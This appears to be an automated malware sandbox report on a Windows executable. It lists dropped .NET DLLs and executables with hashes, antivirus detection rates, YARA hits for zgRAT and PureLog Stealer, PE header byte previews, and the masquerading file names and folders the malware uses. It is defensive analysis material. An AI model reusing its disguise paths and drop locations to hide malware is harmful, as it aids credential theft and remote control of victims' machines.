                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\PjHeJXVW.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                  C:\Users\user\Desktop\SvkCuJlg.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\UXZdmUkL.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):22016
                                                                                                                  Entropy (8bit):5.41854385721431
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\beESemrN.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                  C:\Users\user\Desktop\crKSmbgv.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\lNXiOOwv.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                  C:\Users\user\Desktop\rFAHquBj.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\rWShinUN.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\Desktop\rfCzNWvT.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):85504
                                                                                                                  Entropy (8bit):5.8769270258874755
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                  C:\Users\user\Desktop\uNJXqjUH.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.529329139831718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                  C:\Users\user\backgroundTaskHost.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\backgroundTaskHost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\backgroundTaskHost.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....*(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:*...& ....8....r

                                                                                                                  C:\Users\user\eddb19405b7ce1

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (332), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):332
                                                                                                                  Entropy (8bit):5.792023941284571
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:qyhQoLB/z9yVQtkHUabjIuKsrQd7W+tYUNxQMzjhwguKDPL/iSKg3SK5sKu2:JhQoL99yVGwnftK+QTNx1zju+L93rs0
                                                                                                                  MD5:43BB8FC2D4DF934A4B16C275DF01E5CD
                                                                                                                  SHA1:297C6319983A50E4FDF47EE319FDC5D160E5F8E0
                                                                                                                  SHA-256:873FE767A13D435940EDABB0739D8894CE91DCE77E6C8448A134BF398DEB24D7
                                                                                                                  SHA-512:374B73AB08BC0B0BFE690EA5180E6BBB50921B4774F2D788C5FEAE91B9C3C314C734C63E313D13896055680C260F7869BF2F7008D1FC18AE9CA4841A285607D9
                                                                                                                  Malicious:false
                                                                                                                  Preview:Q6WvkjE7FMJvCgsti4Q06oZVXWxzuibAUhXSkogIIw2Relv21l9vv5XmgBYNvPMhvJaeJaJ3YHrKvI0vk48JjpOZKvwiQSW3jVgVKQtbcFXoNM0YKmn1QD7F4BUYoknFvykalelTKgrdSkL74XYnpfmgXaaI6Vx1bR2ZmZwpBTqtWexU0XdQMAaQMEDLEcXytzCArvVfkslWy2K2mFSi2gpb0mNiVllj52AgcxnEC8peZEbU3Ki8Jy6NJkKEiwJ9GCa62nazcNg31LCwK2oKCnZG5wW1mifPzpXXnfbPutf6SCW8iX3pI87dmUAFRjM4rRELxpIoaYaS

                                                                                                                  C:\Windows\IME\IMEKR\AdbXCBUViTnoVBSsOq.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....*(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:*...& ....8....r

                                                                                                                  C:\Windows\IME\IMEKR\fdadf3e88d0159

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):178
                                                                                                                  Entropy (8bit):5.646136788982501
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:NUSKE7dWNQoXX2MM9jON+3s/zACqkU5+EeBSD8LOM50l69Rj114XsM/HAGgcamz9:FKeWHWV6+Os15pFtUz1OXNHA5GpORnqP
                                                                                                                  MD5:1ADE03E962C1A2719DE6DE0F65D32299
                                                                                                                  SHA1:F680F5D9EB2FD844628646C8322277B38AC9868F
                                                                                                                  SHA-256:F9AE5315A2C4B4EF130B714886CFB132EFF21E79FA3DC3AD4C5BB6CF920D0382
                                                                                                                  SHA-512:750324ADA607D0B3D751D6FA0C94D8191731E91E831F4528D169BBC46BDA0079D12CF11F36A140FB5FFFBE4162C81623273DF0FCE9295F344E056859A37ED3C8
                                                                                                                  Malicious:false
                                                                                                                  Preview:Aaq7oakq1HlM3hd0OrM22SiexdXaDnak6d91ARIZxTeJ0uOt0bsqIvRs1MJLDKnOqBPahm06jxEiyZnDOnkl5ubKLR9xH7WnqQcyeyLNlvHVqt3ciG6ZkCS6kFPQnCylbb2i6ziZbWAJmGecXgOBA6Cn7fOZi5ji7g4P0Vftig7OBJUekx

                                                                                                                  \Device\Null

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):502
                                                                                                                  Entropy (8bit):4.614559420844397
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:PhGI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:pVdUOAokItULVDv
                                                                                                                  MD5:1FD9C0E96FA0A2F8D565FE4FB213EB86
                                                                                                                  SHA1:7DC87BCD84B5C867509BCC7634A7B5EAF4D1B9F7
                                                                                                                  SHA-256:8F90D047643E2E46B67FF76F440B5C3CE391A3204025821D0B76F38BF42C90C8
                                                                                                                  SHA-512:7FF19719E6C0F7F8D7CCC277195C039AFE6C1D83D952451CD0FEDCE200CD8538B6B166BE75B633A6842D9111CF8670283BCBFD55F4BB4BCB5D248935494DD742
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Pinging 138727 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.501793091596948
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:eP6sjvTqJa.exe
                                                                                                                  File size:2'317'084 bytes
                                                                                                                  MD5:f0944c44a97161524ce95c9f8a2629f9
                                                                                                                  SHA1:064fde39864f9095d21fde250473d0a39d6b15b3
                                                                                                                  SHA256:06c99a90dd5ad6dfb77196b202d73b6cffe2915cf9edc372da859c62ac0bc2e7
                                                                                                                  SHA512:31e579123e2a82b1bfe6fd357dd4e3ff65b32632879f554fcf22d3435b40682627ac6b07ca66fb3e9fd1bd03d6d2ccef709d42be21064e964e1513c5888ac504
                                                                                                                  SSDEEP:24576:2TbBv5rUyXVRD3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLm:IBJZTyyfXPzXKBy2GyGw4O0lmJIJU
                                                                                                                  TLSH:B2B5CF0675D18E73C2A157365567423D82A0DB2136A1EF0B3A4F20E6AD17BF08F726B3
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                                  File Icon

                                                                                                                  Icon Hash:1515d4d4442f2d2d

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
